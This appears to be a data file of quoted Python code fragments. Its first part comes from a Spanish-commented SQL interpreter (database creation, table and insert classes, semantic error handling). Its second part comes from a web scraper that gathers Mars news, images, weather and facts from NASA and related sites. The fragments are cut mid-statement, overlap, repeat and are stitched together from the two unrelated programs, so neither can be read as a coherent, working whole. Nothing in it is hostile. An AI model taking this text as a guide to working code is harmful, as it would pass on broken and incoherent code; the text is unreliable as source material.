columnas.split(\",\") for i in x: c = i.split(\":\") print('El nombre es ->", "' + str(self.id)) for val in self.vals: print('value : ' + str(val)) class", "self.cols = cols self.constrain = constrain self.fkey = fkey self.ref = ref def", "else: # si no viene \"OR REPLACE\" if not existe: # si no", "base in bases: # verifico si existe: if base.id == self.id: # si", "print('Ejecutando Drop') print('id : ' + self.id) class CreateTable(): def __init__(self, id, base,", "todas las bases de datos if len(bases) == 0: # si no hay", "not existe: # si no existe la base de datos ts_global.agregar_simbolo(nueva_base) # se", "'\\n\\tNo hay bases de datos creadas.\\n' # se retorna un mensaje respuesta =", "= cols self.inh = inh def execute(self,ts): print('Ejecutando Creare Table') print('id : '", "si no, es error new_error = E.Errores('Semántico.', 'La base de datos \\'' +", "self.id + '\\' no existe.') #ls_error.append(new_error) #se agrega el error a la lista", "replace, ifnot, id, owner, mode): # boolean, boolean, string, string, integer self.replace =", "= owner # nombre/id del creador self.mode = mode # modo de almacenamiento", "= constrain self.fkey = fkey self.ref = ref def execute(self): print('ejecutando alter table')", "#se agrega el error a la lista return None # y retorno None", "si viene \"OR REPLACE\", es error nuevo_error = E.Errores('Semántico.', 'No pueden venir conjuntamente", "nuevo símbolo else: # si no viene \"OR REPLACE\" if existe: # si", "id, vals): print('init') self.id = id self.vals = vals def execute(self): print('Ejecutando Insert')", ":' + str(self.fkey)) print('references : ' + str(self.ref)) class CreateDB(): def __init__(self, replace,", "de datos return '\\n\\tNo hay bases de datos creadas.\\n' # se retorna un", "lista else: # si no viene \"OR REPLACE\" if not existe: # si", "+ '\\n' # se concatenan los nombres return respuesta + '\\n' # y", "else: # si sí viene \"IF NOT EXISTS\" if self.replace: # si viene", "UseDB(): def __init__(self, id): # string self.id = id # nombre de la", "si existe existe = True # si existe, cambio el valor de la", "REPLACE\\' e \\'IF NOT EXISTS\\'.') #ls_error.append(nuevo_error) #se agrega el error a la lista", "retorna un mensaje respuesta = '\\n' # de lo contrario, for base in", "print('Ejecutando Creare Table') print('id : ' + str(self.id)) for col in self.cols :", "agrega el nuevo símbolo else: # si sí viene \"IF NOT EXISTS\" if", "def __init__(self, replace, ifnot, id, owner, mode): # boolean, boolean, string, string, integer", "ts def create_column(db, tabla, columna, tipo, ts): nueva_columna = TS.Simbolo(columna,TS.tipo_simbolo.INTEGER,None,db,0,True,False,None) agregar = ts.agregar_columna(tabla,", "contrario no se hace nada class UseDB(): def __init__(self, id): # string self.id", "if existe: # si existe, es un error nuevo_error = E.Errores('Semántico.', 'Ya existe", "+ '\\n' # y los retorna class Drop(): def __init__(self, id): self.id =", "self.id) class CreateTable(): def __init__(self, id, base, cols, inh): self.id = id, self.base", "si existe: if base.id == self.id: # si sí existe, retorno el id", "str(self.fkey)) print('references : ' + str(self.ref)) class CreateDB(): def __init__(self, replace, ifnot, id,", "la reemplaza/modifica self.ifnot = ifnot # si existe, no la crea self.id =", "mode # modo de almacenamiento def execute(self, ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None,", "respuesta + '\\t' + base.id + '\\n' # se concatenan los nombres return", "no viene \"OR REPLACE\" if not existe: # si no existe la base", "execute(self): print('Ejecutando Drop') print('id : ' + self.id) class CreateTable(): def __init__(self, id,", "c[0] + ' y el tipo es -> ' + c[1]) #create_column(db, nombre,", "de datos if base.id == self.id: # y verifico si existe existe =", "de datos for base in bases: # verifico si existe: if base.id ==", "el error a la lista return None # y retorno None class ShowDB():", "self.id = id self.vals = vals def execute(self): print('Ejecutando Update') print('id : '", ": ' + str(col.tipo)) if self.inh != None : print('Inherit : ' +", "almacenamiento def execute(self, ts_global): nueva_base = TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None, None, None,", "= id self.cols = cols self.constrain = constrain self.fkey = fkey self.ref =", "i.split(\":\") print('El nombre es -> ' + c[0] + ' y el tipo", "self.base = base self.cols = cols self.inh = inh def execute(self,ts): print('Ejecutando Creare", "= TS.tabla_simbolos() #Creación de lista de errores ls_error = [] def create_table(db, nombre,", "lo contrario, for base in bases: # recorre la lista, respuesta = respuesta", "conditions def execute(): #Llamar metodo que realizara el select print('ejecutando select') class AlterTable():", "integer self.replace = replace # si existe, la reemplaza/modifica self.ifnot = ifnot #", "if self.replace: # si viene \"OR REPLACE\", es error nuevo_error = E.Errores('Semántico.', 'No", "lista de bases de datos if base.id == self.id: # y verifico si", "def execute(self): print('Ejecutando Drop') print('id : ' + self.id) class CreateTable(): def __init__(self,", "+ str(self.ref)) class CreateDB(): def __init__(self, replace, ifnot, id, owner, mode): # boolean,", "\"IF NOT EXISTS\" if self.replace: # si viene \"OR REPLACE\", es error nuevo_error", "# se elimina, luego ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: #", "datos for base in bases: # verifico si existe: if base.id == self.id:", "si no viene \"OR REPLACE\" if existe: # si existe, es un error", "existe, la reemplaza/modifica self.ifnot = ifnot # si existe, no la crea self.id", "if existe: # si existe la base de datos ts_global.drop_db(self.id) # se elimina,", "tipo es -> ' + c[1]) #create_column(db, nombre, c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla) return", "# si no viene \"OR REPLACE\" if existe: # si existe, es un", "= id self.vals = vals def execute(self): print('Ejecutando Insert') print('id : ' +", "se crea/reemplaza if self.replace: # si viene \"OR REPLACE\" if existe: # si", "+ str(col.id)) print('col type : ' + str(col.tipo)) if self.inh != None :", "TS.Simbolo(self.id, TS.tipo_simbolo.DATABASE, None, None, None, None, None, None) existe = False # bandera", "in x: c = i.split(\":\") print('El nombre es -> ' + c[0] +", "base de datos def execute(self, ts_global): bases = ts_global.get_databases() # obtiene todas las", "#Creación de la tabla de simbolos ts_global = TS.tabla_simbolos() #Creación de lista de", "base in bases: # recorro la lista de bases de datos if base.id", "de datos ts_global.drop_db(self.id) # se elimina, luego ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo", "= fromcol self.joins = joins self.order = order self.conditions = conditions def execute():", "string, integer self.replace = replace # si existe, la reemplaza/modifica self.ifnot = ifnot", "# si no viene \"OR REPLACE\" if not existe: # si no existe", "\\'' + self.id + '\\' no existe.') #ls_error.append(new_error) #se agrega el error a", ": ' + self.inh) class Insert(): def __init__(self, id, vals): print('init') self.id =", "Update(): def __init__(self, id, vals): self.id = id self.vals = vals def execute(self):", "#create_column(db, nombre, c[0], c[1], ts) ts.agregar_simbolo(nueva_tabla) return ts def create_column(db, tabla, columna, tipo,", "class CreateDB(): def __init__(self, replace, ifnot, id, owner, mode): # boolean, boolean, string,", "se agrega el nuevo símbolo, de lo contrario no se hace nada class", "la base de datos self.owner = owner # nombre/id del creador self.mode =", "si viene \"OR REPLACE\" if existe: # si existe la base de datos", "# obtiene todas las bases de datos if len(bases) == 0: # si", "bases de datos for base in bases: # recorro la lista de bases", "se agrega el nuevo símbolo else: # si sí viene \"IF NOT EXISTS\"", "constrain, fkey, ref): self.id = id self.cols = cols self.constrain = constrain self.fkey", "None, None) existe = False # bandera para comprobar si existe bases =", "id): self.id = id def execute(self): print('Ejecutando Drop') print('id : ' + self.id)", "self.id = id self.vals = vals def execute(self): print('Ejecutando Insert') print('id : '", "y el tipo es -> ' + c[1]) #create_column(db, nombre, c[0], c[1], ts)", "fkey self.ref = ref def execute(self): print('ejecutando alter table') print('id : ' +", "no existe ts_global.agregar_simbolo(nueva_base) # se agrega el nuevo símbolo else: # si sí", "la lista else: # si no viene \"OR REPLACE\" if not existe: #", "# recorre la lista, respuesta = respuesta + '\\t' + base.id + '\\n'", "= cols self.constrain = constrain self.fkey = fkey self.ref = ref def execute(self):", "in bases: # recorre la lista, respuesta = respuesta + '\\t' + base.id", "la lista, respuesta = respuesta + '\\t' + base.id + '\\n' # se", "NOT EXISTS\", se crea/reemplaza if self.replace: # si viene \"OR REPLACE\" if existe:", "def __init__(self, id, vals): self.id = id self.vals = vals def execute(self): print('Ejecutando", "Delete(): def __init__(self, id, cond): self.id = id self.cond = cond def execute(self):", "' + str(self.id)) for col in self.cols : print('col id : ' +", "= replace # si existe, la reemplaza/modifica self.ifnot = ifnot # si existe,", "self.conditions = conditions def execute(): #Llamar metodo que realizara el select print('ejecutando select')", "# si viene \"OR REPLACE\", es error nuevo_error = E.Errores('Semántico.', 'No pueden venir", "dist, selcol, fromcol, joins, order, conditions): self.dist = dist self.selcol = selcol self.fromcol", "viene \"OR REPLACE\", es error nuevo_error = E.Errores('Semántico.', 'No pueden venir conjuntamente las", "# bandera para comprobar si existe bases = ts_global.get_databases() # obtiene todas las", "vals): self.id = id self.vals = vals def execute(self): print('Ejecutando Update') print('id :", "self.ifnot = ifnot # si existe, no la crea self.id = id #", "__init__(self, id, cond): self.id = id self.cond = cond def execute(self): print('Ejecutando Delete')", "owner # nombre/id del creador self.mode = mode # modo de almacenamiento def", "existe: # si no existe la base de datos ts_global.agregar_simbolo(nueva_base) # se agrega", "id): # string self.id = id # nombre de la base de datos", "= id def execute(self): print('Ejecutando Drop') print('id : ' + self.id) class CreateTable():", "for col in self.cols : print('col id : ' + str(col.id)) print('col type", "' + self.inh) class Insert(): def __init__(self, id, vals): print('init') self.id = id", "def __init__(self, id, vals): print('init') self.id = id self.vals = vals def execute(self):", "# si existe, es un error nuevo_error = E.Errores('Semántico.', 'Ya existe una base", "si existe, no la crea self.id = id # nombre de la base", "self.id # si no, es error new_error = E.Errores('Semántico.', 'La base de datos", "keys :' + str(self.fkey)) print('references : ' + str(self.ref)) class CreateDB(): def __init__(self,", "datos return '\\n\\tNo hay bases de datos creadas.\\n' # se retorna un mensaje", "= [] def create_table(db, nombre, columnas, ts): nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db,", "bandera break # y salgo de la comprobación if not self.ifnot: # si", "ts) ts.agregar_simbolo(nueva_tabla) return ts def create_column(db, tabla, columna, tipo, ts): nueva_columna = TS.Simbolo(columna,TS.tipo_simbolo.INTEGER,None,db,0,True,False,None)", "self.selcol = selcol self.fromcol = fromcol self.joins = joins self.order = order self.conditions", "val in self.vals: print('value : ' + str(val)) class Delete(): def __init__(self, id,", "= tipo self.instruccion = instruccion class Select(): def __init__(self, dist, selcol, fromcol, joins,", "def __init__(self, id, cols, constrain, fkey, ref): self.id = id self.cols = cols", "errores ls_error = [] def create_table(db, nombre, columnas, ts): nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE,", "# y los retorna class Drop(): def __init__(self, id): self.id = id def" ]
[ "{'executable_path': 'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0;", "'html.parser') #find image link and title img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title')", "as pd from splinter import Browser from bs4 import BeautifulSoup import time #dictionary", "html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the full image button click1=browser.find_by_css('a[class=\"button", "browser.visit(url_2) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the full image button", "#do all of the step above for each hemisphere img_urls =[] titles=[] for", "' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url + img_search[0]['src'] img_link #do all of the", "= 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search =", "page with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking page", "soup = BeautifulSoup(html, 'html.parser') #find the link to the full size image img_partial", "facts_table[0] mars_table = mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile',", "drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html =", "the more info button click2=browser.links.find_by_partial_text('more info').click() #parse the page html = browser.html soup", "img_urls =[] titles=[] for i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html =", "soup = BeautifulSoup(html, 'html.parser') search = soup.find('section', class_= 'grid_gallery module list_view') title_search =", "python # coding: utf-8 def scrape(): import pandas as pd from splinter import", "'enhanced' at the end, just getting rid of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link", "i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup = BeautifulSoup(html,", "fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info button click2=browser.links.find_by_partial_text('more info').click() #parse the page", "BeautifulSoup(html, 'html.parser') #find image link and title img_search = soup.find_all('img',class_='wide-image' ) title_search =", "time.sleep(2) html = browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather", "mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html')", "url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the full image", "= 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url)", "full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking page html = browser.html", "info').click() #parse the page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find the", "soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup =", "the word 'enhanced' at the end, just getting rid of that ' '.join(title_search[0].text.split('", "all of the step above for each hemisphere img_urls =[] titles=[] for i", "title img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles had the word 'enhanced'", "browser.visit(url_1) html = browser.html soup = BeautifulSoup(html, 'html.parser') search = soup.find('section', class_= 'grid_gallery", "the full size image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url", "= browser.html soup = BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title')", "'html.parser') facts_table = pd.read_html(facts_url) mars_table = facts_table[0] mars_table = mars_table.rename(columns = {0:'Mars Planet", "mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') facts_table", "base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the", "size image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en'", "soup = BeautifulSoup(html, 'html.parser') #click the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click()", "f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html soup =", "the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking page html =", "#add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup =", "soup.find_all('h2',class_='title') #titles had the word 'enhanced' at the end, just getting rid of", "title_search = soup.find_all('h2',class_='title') #titles had the word 'enhanced' at the end, just getting", "html = browser.html soup = BeautifulSoup(html, 'html.parser') #find image link and title img_search", "to get to the page with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html", "img_urls titles hemisphere_image_urls = [] urls ={} for i in range(4): urls['title']=titles[i] urls['img_url']=img_urls[i]", "the link to the full size image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}'", "title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls =", "titles hemisphere_image_urls = [] urls ={} for i in range(4): urls['title']=titles[i] urls['img_url']=img_urls[i] hemisphere_image_urls.append(urls)", "import pandas as pd from splinter import Browser from bs4 import BeautifulSoup import", "after clicking page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find image link", "p_search[0].text #add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup", "#find image link and title img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles", "mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup", "mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup = BeautifulSoup(html,", "the page with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking", "list_view') title_search = search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text", "soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles had the word 'enhanced' at the end,", "html again after clicking page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find", "= browser.html soup = BeautifulSoup(html, 'html.parser') #click the image link to get to", "mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html soup = BeautifulSoup(html,", "the end, just getting rid of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url", "'html.parser') search = soup.find('section', class_= 'grid_gallery module list_view') title_search = search.find_all('div', class_= 'content_title',limit=1)", "of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url + img_search[0]['src'] img_link #do all", "= BeautifulSoup(html, 'html.parser') #click the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click", "'html.parser') #find the link to the full size image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url", "end, just getting rid of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url +", "= soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls", "mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0", "browser.html soup = BeautifulSoup(html, 'html.parser') #find the link to the full size image", "= BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url) mars_table = facts_table[0] mars_table = mars_table.rename(columns =", "= mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url =", "news_p = p_search[0].text #add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html =", ") title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls", "img_search[0]['src'] img_link #do all of the step above for each hemisphere img_urls =[]", "soup = BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url) mars_table = facts_table[0] mars_table = mars_table.rename(columns", "Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url)", "data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup = BeautifulSoup(html,", "= BeautifulSoup(html, 'html.parser') search = soup.find('section', class_= 'grid_gallery module list_view') title_search = search.find_all('div',", "= base_url + img_search[0]['src'] img_link #do all of the step above for each", "= browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url", "soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html =", "'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the image link", "soup = BeautifulSoup(html, 'html.parser') #click the image link to get to the page", "'.join(title_search[0].text.split(' ')[:-1]) img_link = base_url + img_search[0]['src'] img_link #do all of the step", "IMAGE').click() #click the more info button click2=browser.links.find_by_partial_text('more info').click() #parse the page html =", "info button click2=browser.links.find_by_partial_text('more info').click() #parse the page html = browser.html soup = BeautifulSoup(html,", "soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls = [] urls", "title_search = search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p", "= BeautifulSoup(html, 'html.parser') #click the image link to get to the page with", "#dictionary with all data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser = Browser('chrome', **executable_path,", "more info button click2=browser.links.find_by_partial_text('more info').click() #parse the page html = browser.html soup =", "'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url) mars_table", "'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html =", "browser.html soup = BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append('", "**executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/'", "html = browser.html soup = BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url) mars_table = facts_table[0]", "browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url =", "executable_path = {'executable_path': 'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows", "Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url =", "to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup = BeautifulSoup(html, 'html.parser')", "= BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url)", "that ' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url + img_search[0]['src'] img_link #do all of", "soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles", "time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup = BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image'", "= soup.find('section', class_= 'grid_gallery module list_view') title_search = search.find_all('div', class_= 'content_title',limit=1) p_search =", "= search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p =", "class_= 'grid_gallery module list_view') title_search = search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1)", "html = browser.html soup = BeautifulSoup(html, 'html.parser') #find the link to the full", "')[:-1]) img_link = base_url + img_search[0]['src'] img_link #do all of the step above", "browser.html soup = BeautifulSoup(html, 'html.parser') #click the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL", "mars_table = facts_table[0] mars_table = mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars", "above for each hemisphere img_urls =[] titles=[] for i in range(4): browser.visit(hemisphere_url) time.sleep(1)", "BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url) mars_table = facts_table[0] mars_table = mars_table.rename(columns = {0:'Mars", "to the full size image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url", "BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url", "'grid_gallery module list_view') title_search = search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title", "= 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the image", "each hemisphere img_urls =[] titles=[] for i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1)", "Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html", "'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article')", "= facts_table[0] mars_table = mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet", "img_link #do all of the step above for each hemisphere img_urls =[] titles=[]", "import BeautifulSoup import time #dictionary with all data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'}", "time.sleep(1) html = browser.html soup = BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search", "= browser.html soup = BeautifulSoup(html, 'html.parser') search = soup.find('section', class_= 'grid_gallery module list_view')", "clicking page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find image link and", "= mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile', drop=True) mars_table", "Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'", "data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True, user_agent =", "= soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup", "range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup = BeautifulSoup(html, 'html.parser') img_search", "')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls = [] urls ={} for i", "= soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles had the word 'enhanced' at the", "mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup = BeautifulSoup(html, 'html.parser')", "#get html again after clicking page html = browser.html soup = BeautifulSoup(html, 'html.parser')", "{0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url", "= soup.find_all('h2',class_='title') #titles had the word 'enhanced' at the end, just getting rid", "scrape(): import pandas as pd from splinter import Browser from bs4 import BeautifulSoup", "= soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html", "res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking page html = browser.html soup", "= BeautifulSoup(html, 'html.parser') #find image link and title img_search = soup.find_all('img',class_='wide-image' ) title_search", "Win64; x64)') url_1 = 